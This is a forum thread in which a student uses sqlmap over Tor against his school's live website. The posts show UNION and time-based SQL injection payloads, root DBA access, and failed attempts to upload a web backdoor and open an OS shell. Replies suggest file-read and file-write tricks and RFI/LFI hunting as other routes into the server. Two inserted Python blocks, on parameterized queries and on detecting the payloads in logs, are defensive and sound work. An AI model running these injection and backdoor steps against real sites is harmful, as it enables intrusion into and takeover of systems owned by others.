Author Topic: mysql db of my school  (Read 2604 times)


Offline s0uthboy

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 1
mysql db of my school
« on: August 21, 2013, 01:23:37 pm »

Hello there,
My school website has a MySQL DB; I've found multiple vulnerabilities in it with MySQL.
I've asked our teacher (the webmaster) if I could practice some security tests.


I've found multiple vulnerabilities in the database, and I've also cracked the admin password, but I have a doubt that I will explain to your much more experienced eyes, so I'm in front of this scenario:


Code:
[*] starting at 13:06:17


[13:06:18] [INFO] resuming back-end DBMS 'mysql'
[13:06:18] [INFO] testing connection to the target URL
|S-chain|-<>-127.0.0.1:9050-<><>-*.*.*.*:80-<><>-OK
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a786b793a,0x696e4f6a646e68504971,0x3a71666d3a),NULL#


    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=' AND 3502=BENCHMARK(5000000,MD5(0x48537954)) AND 'dqVz'='dqVz
---
[13:06:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:06:21] [INFO] fetching current user
current user:    'root@localhost'
[13:06:21] [INFO] testing if current user is DBA
[13:06:21] [INFO] fetching current user
current user is DBA:    True
[13:06:21] [INFO] fetched data logged to text files under '/opt/backbox/sqlmap/output/


[*] shutting down at 13:06:21


So the user is root and, of course, I have DBA permissions, but when I try to switch to --os-shell I get this:


Code:
s0uthboy@GLaDOS2:~$ sudo proxychains /opt/backbox/sqlmap/sqlmap.py -u "http://www.schoolsite.it/index2.php?id=" --os-shell
ProxyChains-3.1 (http://proxychains.sf.net)


    sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool
    http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting at 13:10:15


[13:10:16] [INFO] resuming back-end DBMS 'mysql'
[13:10:16] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a786b793a,0x696e4f6a646e68504971,0x3a71666d3a),NULL#


    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=' AND 3502=BENCHMARK(5000000,MD5(0x48537954)) AND 'dqVz'='dqVz
---
[13:10:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:10:19] [INFO] going to use a web backdoor for command prompt
[13:10:19] [INFO] fingerprinting the back-end DBMS operating system
[13:10:19] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[13:10:21] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search


> 2
please provide the web server document root: /var/www/school/docs/
[13:12:24] [WARNING] unable to retrieve automatically any web server path
[13:12:24] [INFO] trying to upload the file stager on '/var/www/school/docs' via LIMIT INTO OUTFILE technique
[13:12:25] [WARNING] reflective value(s) found and filtering out
[13:12:26] [WARNING] unable to upload the file stager on '/var/www/school/docs'
[13:12:26] [INFO] trying to upload the file stager on '/var/www/school/docs' via UNION technique
[13:12:27] [WARNING] expect junk characters inside the file as a leftover from UNION query
[13:12:29] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[13:12:30] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[13:12:30] [INFO] fetched data logged to text files under


[*] shutting down at 13:12:30



Same errors with --os-cmd and --os-pwn; I've also made some tests using --sql-shell with the INTO OUTFILE technique, but nothing.

That's it. I need to know if there is another way to upload something without using the admin panel on the website, or if there is another way to get into the server.


Thanks for your attention ;)
« Last Edit: August 26, 2013, 03:05:47 pm by s0uthboy »
______
< sup? >
   ------
        \   ^__^
          \  (oo)\_______
             (__)\              )\/\
                       ||----w |
                       ||       ||
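The injection point in the first post is a GET parameter id that the page splices into its SQL as a string. The Python below is an added example, not the school site's code and not part of sqlmap: it reproduces that pattern against an in-memory SQLite table and sets it beside the validated, parameterized version. The pages table, its columns and the SQLite translation of sqlmap's CONCAT marker payload are assumptions made for the example.

```python
import re
import sqlite3

# Constructed stand-in for a page looked up by a numeric id (like index2.php?id=).
# SQLite is used so the example runs offline; the vulnerable pattern is the same
# one a MySQL-backed PHP page would have.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
    INSERT INTO pages VALUES (1, 'Home', 'Welcome');
    INSERT INTO pages VALUES (2, 'Contact', 'Office hours');
""")

# The marker sqlmap's UNION payload in the thread builds with
# CONCAT(0x3a786b793a, 0x696e4f6a646e68504971, 0x3a71666d3a): the hex literals
# decode to ':xky:' + 'inOjdnhPIq' + ':qfm:'. Seeing the marker reflected in the
# response is how sqlmap confirms that the column is injectable.
SQLMAP_MARKER = ":xky:inOjdnhPIq:qfm:"

# Same payload shape in SQLite syntax (|| instead of CONCAT, -- instead of #);
# the column count (2) matches the vulnerable query below.
UNION_PAYLOAD = "' UNION ALL SELECT NULL, ':xky:' || 'inOjdnhPIq' || ':qfm:'--"


def lookup_vulnerable(page_id: str):
    """String concatenation: the request parameter becomes part of the SQL text."""
    sql = "SELECT title, body FROM pages WHERE id = '" + page_id + "'"
    return _conn.execute(sql).fetchall()


def lookup_hardened(page_id: str):
    """Check the parameter's shape, then bind it; the value never touches the SQL text."""
    if not re.fullmatch(r"\d{1,9}", page_id):
        return []  # reject anything that is not a small non-negative integer
    sql = "SELECT title, body FROM pages WHERE id = ?"
    return _conn.execute(sql, (int(page_id),)).fetchall()


def is_injectable(lookup) -> bool:
    """True when the UNION payload makes the marker come back in a result row."""
    try:
        rows = lookup(UNION_PAYLOAD)
    except sqlite3.Error:
        return False
    return any(SQLMAP_MARKER in str(value) for row in rows for value in row)


if __name__ == "__main__":
    print("vulnerable:", lookup_vulnerable(UNION_PAYLOAD), is_injectable(lookup_vulnerable))
    print("hardened:  ", lookup_hardened(UNION_PAYLOAD), is_injectable(lookup_hardened))
```

The marker test is the same reflection check sqlmap performs. In the hardened version the payload is rejected before any query runs, and even an accepted value is bound as data, so it cannot change the statement; the database account the page connects with is a separate problem (the thread shows it running as root with DBA rights), and should be an unprivileged user regardless of the fix above.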

Offline robber

  • NULL
  • Posts: 2
  • Cookies: 0
Re: mysql db of my school
« Reply #1 on: August 26, 2013, 12:21:00 pm »
Check if the user has file_priv, then load_file or into_outfile. Maybe file_priv = 0/OFF, or find a writable directory; check /etc/hosts and /etc/named.conf too if you can.

Z3R0

  • Guest
Re: mysql db of my school
« Reply #2 on: August 27, 2013, 05:30:40 am »
Quote
404 (Not Found) - 2 TIMES
The directory you're trying to have sqlmap upload the shell to doesn't exist. Try a different directory when it prompts you for the web root.

Offline s0uthboy

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 1
Re: mysql db of my school
« Reply #3 on: August 27, 2013, 03:40:18 pm »
Quote
The directory you're trying to have sqlmap upload the shell to doesn't exist. Try a different directory when it prompts you for the web root.


That's the weird part: I'm sure that the directory exists, I've asked our teacher, and also if I do --file-read /var/www/school/docs/index.php sqlmap successfully dumps the index page...


If I try to browse that directory via browser, it displays access denied, so I've tried some dirs that can be explored, /var/www/school/icons/ & /var/www/school/images/... I have all privileges, as --roles says... so I'm pretty confused :(


I think that the MySQL privileges are limited on the machine; I mean that I can be root on the DBMS without having sudo privileges on the remote machine.


It's time to do my homework and find an RFI/LFI bug :D, too much automated exploitation is not the way.

 
« Last Edit: August 28, 2013, 03:53:25 am by s0uthboy »
______
< sup? >
   ------
        \   ^__^
          \  (oo)\_______
             (__)\              )\/\
                       ||----w |
                       ||       ||

Z3R0

  • Guest
Re: mysql db of my school
« Reply #4 on: August 29, 2013, 07:43:28 am »
Quote
2much automated exploitation is not the way
+1 I'm glad you're seeking alternate means. Good luck, and let us know how it goes!
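For the webmaster's side of this thread: the two sqlmap payloads in the first post (a UNION with NULL columns carrying a CONCAT of hex literals, and a BENCHMARK() time-based probe) are easy to spot in Apache access logs. The following Python is an added example, not from the thread or from sqlmap; it runs three indicator patterns over constructed log lines in combined format, decoding the request path first so URL-encoded payloads are matched. The log lines, IPs and indicator names are made up for the example.

```python
import re
from urllib.parse import unquote_plus

# Indicators derived from the two payload shapes shown in the first post,
# matched against the URL-decoded request line.
INDICATORS = {
    "union_null": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\s+NULL\b", re.I),
    "hex_concat": re.compile(r"\bCONCAT\s*\(\s*0x[0-9a-f]+", re.I),
    "benchmark": re.compile(r"\bBENCHMARK\s*\(\s*\d+\s*,", re.I),
}

# Apache combined log format; enough fields to pull out client IP, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed access-log lines (not real traffic); the injected values are
# URL-encoded the way a browser or sqlmap would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Aug/2013:13:06:18 +0200] "GET /index2.php?id=3 HTTP/1.1" 200 5120
10.0.0.9 - - [21/Aug/2013:13:06:19 +0200] "GET /index2.php?id=%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x3a786b793a%2C0x696e4f6a646e68504971%2C0x3a71666d3a%29%2CNULL%23 HTTP/1.1" 200 5347
10.0.0.9 - - [21/Aug/2013:13:06:20 +0200] "GET /index2.php?id=%27%20AND%203502%3DBENCHMARK%285000000%2CMD5%280x48537954%29%29%20AND%20%27dqVz%27%3D%27dqVz HTTP/1.1" 200 5120
10.0.0.5 - - [21/Aug/2013:13:06:21 +0200] "GET /icons/logo.png HTTP/1.1" 200 834
"""


def scan_access_log(text: str):
    """Return one finding per suspicious request: (client ip, decoded path, indicator names)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        decoded = unquote_plus(m["path"])
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append((m["ip"], decoded, hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan_access_log(SAMPLE_LOG):
        print(ip, hits, path[:60])
```

Decoding before matching matters: sqlmap sends the payload percent-encoded, so a pattern applied to the raw log line would miss it. Ordinary requests for the same page (id=3) and for static files produce no finding, so the output can be fed to an alerting rule without drowning in noise; the same indicators apply to the 404 entries the thread mentions, which in this case came from the failed stager uploads.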